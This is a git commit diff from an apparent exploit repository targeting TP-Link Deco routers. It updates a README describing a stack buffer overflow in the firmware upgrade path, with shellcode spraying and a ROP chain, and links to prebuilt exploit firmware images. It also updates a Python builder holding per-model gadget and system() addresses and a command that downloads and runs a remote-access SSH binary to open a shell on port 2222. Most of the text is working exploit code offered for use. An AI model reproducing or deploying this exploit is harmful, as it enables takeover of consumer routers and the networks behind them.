confirmed working exploit on m4rv3

naf419 · Nov 3, 2024 · e2212b3 · e2212b3
1 parent 16a074f
commit e2212b3
Show file tree

Hide file tree

Showing 2 changed files with 35 additions and 21 deletions.
diff --git a/userspace_fw_upgrade/README.md b/userspace_fw_upgrade/README.md
@@ -4,23 +4,34 @@ that accepts manually specified firmware images
 - This code also has unconstrained sscanf reading the "fw-type" field
 from the user-provided firmware file into a fixed 256-byte stack buffer
 
-### Exploit
+### Exploit Strategy
 - Take control of PC by overflowing stack buffer enough to overwrite return address
 - Point return address into range where kernel could mmap a 16MB file
-- Spray the firmware file with shellcode to catch whichever region ASLR selects
+- MIPS: Spray the firmware file with shellcode to catch whichever region ASLR selects
+- ARM: To defeat NX protection on mmap'd pages, spray the firmware file with addresses of a ROP gadget in non-PIE binary that manipulates stack to jump to system@got entry with a specified command string
 
-### Shellcode
-- [bind shell from metasploit](https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb)
+### Payload
+- MIPS: [bind shell from metasploit](https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb)
+- ARM: [reverse-ssh in bind mode](https://github.com/Fahrj/reverse-ssh)
 
 ### Possible Applicable Devices
 - Many TP-Link Deco devices
 
 ### Devices With Confirmed Working Exploit
-- [Deco S4 v2 firmware 1.6.1](https://github.com/naf419/tplink_deco_exploits/releases/download/v3/deco_fw_overflow_bindshell_mips.bin)
-- [Deco X20 v3 firmware 1.1.8](https://github.com/naf419/tplink_deco_exploits/releases/download/v3/deco_fw_overflow_bindshell_mipsel.bin)
+- [Deco S4 v2 firmware 1.6.1](https://github.com/naf419/tplink_deco_exploits/releases/download/v4/deco_fw_overflow_bindshell_mips.bin)
+- [Deco X20 v3 firmware 1.1.8](https://github.com/naf419/tplink_deco_exploits/releases/download/v4/deco_fw_overflow_bindshell_mipsel.bin)
+- [Deco M4R V3 firmware 1.6.1](https://github.com/naf419/tplink_deco_exploits/releases/download/v4/deco_fw_overflow_ssh_arm_m4rv3.bin)
+
+### Devices That Probably Work But Need Testers To Confirm
+- [Deco M9+ V2 firmware 1.5.0](https://github.com/naf419/tplink_deco_exploits/releases/download/v4/deco_fw_overflow_ssh_arm_m9+v2.bin)
+- [Deco M5 V3.28 firmware 1.7.3](https://github.com/naf419/tplink_deco_exploits/releases/download/v4/deco_fw_overflow_ssh_arm_m5v3.bin)
+
 
 ### Building
 ```
 python build_fw_mips.py > deco_fw_overflow_bindshell_mips.bin
 python build_fw_mipsel.py > deco_fw_overflow_bindshell_mipsel.bin
+python build_fw_arm.py m4rv3 > deco_fw_overflow_ssh_arm_m4rv3.bin
+python build_fw_arm.py m9+v2 > deco_fw_overflow_ssh_arm_m9+v2.bin
+python build_fw_arm.py m5v3 > deco_fw_overflow_ssh_arm_m5v3.bin
 ```
diff --git a/userspace_fw_upgrade/build_fw_arm.py b/userspace_fw_upgrade/build_fw_arm.py
@@ -1,10 +1,19 @@
 import sys
 from struct import pack
 
-#TODO: no https support in wget, so need to rehost this file locally somewhere router can access
-command = b"echo here; cd /tmp; wget http://192.168.1.102:8082/reverse-ssh; chmod +x /tmp/reverse-ssh; /tmp/reverse-ssh -l -p 2222 -s /bin/ash; touch /tmp/done"
+def usage():
+    print("USAGE: %s { m4rv3 | m9+v2 | m5v3 }" % (sys.argv[0]))
+    sys.exit(1)
 
-#NOTE: reverse-ssh from https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/reverse-ssh-armv7-x86
+if ((len(sys.argv)) < 2):
+    usage()
+
+board=sys.argv[1]
+if (not( board == "m9+v2" or board == "m4rv3" or board == "m5v3" )):
+    usage()
+
+#run our own ssh server in bind mode listening on port 2222, username 'root', password 'letmeinbrudipls'
+command = b"cd /tmp; curl -kL https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/reverse-ssh-armv7-x86 > /tmp/reverse-ssh; chmod +x /tmp/reverse-ssh; /tmp/reverse-ssh -l -p 2222 -s /bin/ash"
 
 crap = b"JUST DOING SOME SSCANF STACK SMASHING NOTHING TO SEE HERE"
 
@@ -19,18 +28,12 @@
 #page_addr_qemu = 0x76200000
 
 #virtual addresses in non-PIE nvrammanager binary:
-
-#=== m9+ v2 1.5.0 ===
-#ropgadget_addr = 0x1e41c
-#system_addr = 0x114e8
-
-#=== m4r v3 1.6.1 ===
-#ropgadget_addr = 0x1ebdc
-#system_addr = 0x113c4
-
-#=== m5 v3.28 1.7.3 ===
-#ropgadget_addr = 0x1ed6c
-#system_addr = 0x113e8
+if (board == "m9+v2"): #firmware v1.5.0
+    ropgadget_addr, system_addr = 0x1e41c, 0x114e8
+if (board == "m4rv3"): #firmware v1.6.1
+    ropgadget_addr, system_addr = 0x1ebdc, 0x113c4
+if (board == "m5v3"): #firmware v1.7.3
+    ropgadget_addr, system_addr = 0x1ed6c, 0x113e8
 
 #rop gadget: str r3, [fp, #-0x18]; ldr r3, [fp, #-0x1c]; mov r0, r3; sub sp, fp, #4; pop {fp, pc};